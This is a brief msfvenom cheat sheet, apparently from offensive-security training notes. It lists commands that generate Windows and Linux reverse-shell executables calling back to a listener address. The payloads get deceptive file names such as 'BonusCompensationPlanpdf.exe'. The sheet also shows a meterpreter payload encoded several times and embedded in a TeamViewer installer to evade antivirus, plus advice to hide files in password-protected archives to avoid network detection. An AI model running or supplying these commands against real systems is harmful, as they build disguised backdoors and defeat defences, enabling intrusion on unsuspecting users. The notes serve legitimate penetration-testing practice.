msfvenom
Listing Payloads
msfvenom -l payloads
Staged vs Stageless payloads
windows/meterpreter/reverse_tcp
vs windows/meterpreter_reverse_tcp
The former is staged, after the architecture each /
is a stage. The latter doesn't have a /
after the meterpreter part, so it's stageless
Creating a payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
-p
build payload-f
output format
List options
msfvenom -p java/jsp_shell_reverse_tcp --list-options
Basic msfvenom
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>
One can also use the -a to specify the architecture or the --platform Listing
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
Common params when creating a shellcode
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
Encoding
-b "\x00" -e x86/shikata_ga_nai
-b
for bad bytes-e
encoding
Antivirus evasion
Hiding payload inside of legitimate executables
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
-i
iterations of encoding-k
continue with normal execution-x
input file to embed the payload into-o
output file
Archiving
use multiple zip/rar/compression layers with passwords to evade detection on the network
Packing
A list of popular packer software:
Also see PolyPack.
Last updated